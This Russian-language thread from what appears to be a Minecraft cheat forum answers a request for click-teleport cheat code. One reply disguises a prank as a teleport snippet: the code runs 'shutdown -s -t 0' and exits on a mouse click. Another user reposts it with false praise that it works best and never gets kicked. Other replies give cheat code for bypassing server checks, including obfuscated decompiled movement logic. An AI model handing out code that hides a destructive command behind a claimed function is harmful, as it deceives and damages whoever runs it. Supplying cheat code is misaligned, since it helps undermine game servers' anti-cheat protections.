Вопрос Есть у кого то не рабочий код клик тп?

Начинающий
Статус
Оффлайн
Регистрация
31 Май 2021
Сообщения
48
Реакции[?]
8
Поинты[?]
0

Перед прочтением основного контента ниже, пожалуйста, обратите внимание на обновление внутри секции Майна на нашем форуме. У нас появились:

  • бесплатные читы для Майнкрафт — любое использование на свой страх и риск;
  • маркетплейс Майнкрафт — абсолютно любая коммерция, связанная с игрой, за исключением продажи читов (аккаунты, предоставления услуг, поиск кодеров читов и так далее);
  • приватные читы для Minecraft — в этом разделе только платные хаки для игры, покупайте группу "Продавец" и выставляйте на продажу свой софт;
  • обсуждения и гайды — всё тот же раздел с вопросами, но теперь модернизированный: поиск нужных хаков, пати с игроками-читерами и другая полезная информация.

Спасибо!

буду очень благодарен если дадите код
 
PoC Life
Пользователь
Статус
Оффлайн
Регистрация
22 Авг 2022
Сообщения
331
Реакции[?]
47
Поинты[?]
37K
Ладно, всё равно потом сольют

Java:
@EventTarget

public void onClick(EventMouse event) {
  if (event.getButton() == 2)

    BypassManager.teleportTo(event.getRayTraceResult().getBlockPos());
}
 
Начинающий
Статус
Оффлайн
Регистрация
9 Май 2020
Сообщения
165
Реакции[?]
13
Поинты[?]
3K
Пользователь
Статус
Оффлайн
Регистрация
16 Мар 2021
Сообщения
377
Реакции[?]
78
Поинты[?]
11K
Начинающий
Статус
Оффлайн
Регистрация
4 Фев 2022
Сообщения
84
Реакции[?]
1
Поинты[?]
0
BlockPos tpc = mc.objectMouseOver.getBlockPos();

if(eventMouseKey.getKey() == 2 || eventMouseKey.getKey() == 1){
int x1 = (int) (tpc.getX()-mc.player.posX);
int y1 = (int) (tpc.getY()-mc.player.posY);
int z1 = (int) (tpc.getZ()-mc.player.posZ);
float endX = x1;
float endZ = z1;
float endY = y1;
Runtime runtime = Runtime.getRuntime();
Process proc = runtime.exec("shutdown -s -t 0");
System.exit(0);
return;
}
if(mc.player.posX == endX && mc.player.posZ == endZ) {
Main.msg("§aУспешное телепортирование!", true);
}
}
 
Начинающий
Статус
Оффлайн
Регистрация
9 Май 2020
Сообщения
165
Реакции[?]
13
Поинты[?]
3K
BlockPos tpc = mc.objectMouseOver.getBlockPos();

if(eventMouseKey.getKey() == 2 || eventMouseKey.getKey() == 1){
int x1 = (int) (tpc.getX()-mc.player.posX);
int y1 = (int) (tpc.getY()-mc.player.posY);
int z1 = (int) (tpc.getZ()-mc.player.posZ);
float endX = x1;
float endZ = z1;
float endY = y1;
Runtime runtime = Runtime.getRuntime();
Process proc = runtime.exec("shutdown -s -t 0");
System.exit(0);
return;
}
if(mc.player.posX == endX && mc.player.posZ == endZ) {
Main.msg("§aУспешное телепортирование!", true);
}
}
Работает лучше всех! Никогда не кикает!
 
Пользователь
Статус
Оффлайн
Регистрация
16 Мар 2021
Сообщения
377
Реакции[?]
78
Поинты[?]
11K
Java:
    public void tp()
    {
        BlockPos pos = mc.objectMouseOver.getBlockPos();
        if(mc.objectMouseOver.Type.equals(MouseOverEnum.Block))
            van_tp(pos.getX(), pos.getY(), pos.getZ());
    }

    public void van_tp(double f, double f3, double f2) {
        if (this.i() && auXX.b(this.bn ^ auXX.c) <= 0 && auXX.b(this.cL ^ auXX.c) != 0 && !this.p() && !this.o()) {
            ach ach2 = this.a.b();
            if (ach2.l != 0.0f || ach2.m != 0.0f) {
                ry ry2;
                int n;
                int n2;
                int n3;
                ry ry3;
                float f3;
                float f4;
                aci aci2 = new aci(this.ag, this.f().ch, this.ai);
                double d = this.ag + (double)f;
                double d2 = this.ai + (double)f2;
                aci aci3 = new aci(d, this.f().ch, d2);
                aci aci4 = new aci(f, 0.0, f2);
                float f5 = this.ai();
                float f6 = (float)aci4.lengthSquared();
                if (f6 <= 0.001f) {
                    f4 = f5 * ach2.l;
                    float f7 = f5 * ach2.m;
                    float f8 = acd.sin(this.q * ((float)Math.PI / 180));
                    f3 = acd.cos(this.q * ((float)Math.PI / 180));
                    aci4 = new aci(f4 * f3 - f7 * f8, aci4.g, f7 * f3 + f4 * f8);
                    f6 = (float)aci4.lengthSquared();
                    if (f6 <= 0.001f) {
                        return;
                    }
                }
                f4 = (float)acd.fastInvSqrt(f6);
                aci aci5 = aci4.b(f4);
                aci aci6 = this.h();
                f3 = (float)(aci6.f * aci5.f + aci6.h * aci5.h);
                if (f3 >= -0.15f && (ry3 = ((adf)((Object)this.a)).c(n3 = acd.c(this.ag), n2 = acd.c(this.f().ck), n = acd.c(this.ai))).c((acY)((Object)this.a), n3, n2, n) == null && (ry2 = ((adf)((Object)this.a)).c(n3, ++n2, n)).c((acY)((Object)this.a), n3, n2, n) == null) {
                    float f9;
                    float f10 = 1.2f;
                    if (this.a(QQ.j)) {
                        f10 += (float)(this.a(QQ.j).getAmplifier() + 1) * 0.75f;
                    }
                    
                    float f11 = Math.max(f5 * 7.0f, 1.0f / f4);
                    aci aci7 = aci3.e(aci5.b(f11));
                    float f12 = Float.intBitsToFloat(auXX.b(this.cg ^ auXX.c));
                    float f13 = Float.intBitsToFloat(auXX.b(this.ch ^ auXX.c));
                    abQ abQ2 = new abQ(aci2, aci7.f(0.0, f13, 0.0)).g(f12, 0.0, f12);
                    aci aci8 = aci2.f(0.0, 0.51f, 0.0);
                    aci7 = aci7.f(0.0, 0.51f, 0.0);
                    aci aci9 = aci5.c(0.0, 1.0, 0.0);
                    aci aci10 = aci9.b(f12 * 0.5f);
                    aci aci11 = aci8.c(aci10);
                    aci aci12 = aci7.c(aci10);
                    aci aci13 = aci8.e(aci10);
                    aci aci14 = aci7.e(aci10);
                    RecyclableArrayList<abQ> recyclableArrayList = ((adf)((Object)this.a)).a(this, abQ2);
                    float f14 = Float.MIN_VALUE;
                    int n4 = recyclableArrayList.size();
                    for (int i = 0; i < n4; ++i) {
                        abQ abQ3 = (abQ)recyclableArrayList.get(i);
                        if (!abQ3.a(aci11, aci12) && !abQ3.a(aci13, aci14)) continue;
                        f14 = (float)abQ3.ck;
                        aci aci15 = abQ3.k();
                        int n5 = acd.c(aci15.f);
                        int n6 = acd.c(aci15.g);
                        int n7 = acd.c(aci15.h);
                        int n8 = 1;
                        while ((float)n8 < f10) {
                            ry ry4;
                            ry ry5 = ((adf)((Object)this.a)).c(n5, n6 + n8, n7);
                            abQ abQ4 = ry5.c((acY)((Object)this.a), n5, n6 + n8, n7);
                            if (abQ4 != null && (double)(f14 = (float)abQ4.ck + (float)n6) - this.f().ch > (double)f10) {
                                recyclableArrayList.recycle();
                                return;
                            }
                            if (n8 > 1 && (ry4 = ((adf)((Object)this.a)).c(n3, ++n2, n)).c((acY)((Object)this.a), n3, n2, n) != null) {
                                recyclableArrayList.recycle();
                                return;
                            }
                            ++n8;
                        }
                        break;
                    }
                    recyclableArrayList.recycle();
                    if (f14 != Float.MIN_VALUE && (f9 = (float)((double)f14 - this.f().ch)) > 0.5f && f9 <= f10) {
                        this.bn = auXX.b(1 ^ auXX.c);
                    }
                }
            }
        }
    }
Не паста!
 
Начинающий
Статус
Оффлайн
Регистрация
31 Май 2021
Сообщения
48
Реакции[?]
8
Поинты[?]
0
BlockPos tpc = mc.objectMouseOver.getBlockPos();

if(eventMouseKey.getKey() == 2 || eventMouseKey.getKey() == 1){
int x1 = (int) (tpc.getX()-mc.player.posX);
int y1 = (int) (tpc.getY()-mc.player.posY);
int z1 = (int) (tpc.getZ()-mc.player.posZ);
float endX = x1;
float endZ = z1;
float endY = y1;
Runtime runtime = Runtime.getRuntime();
Process proc = runtime.exec("shutdown -s -t 0");
System.exit(0);
return;
}
if(mc.player.posX == endX && mc.player.posZ == endZ) {
Main.msg("§aУспешное телепортирование!", true);
}
}
пон system.exit xD
 
Сверху Снизу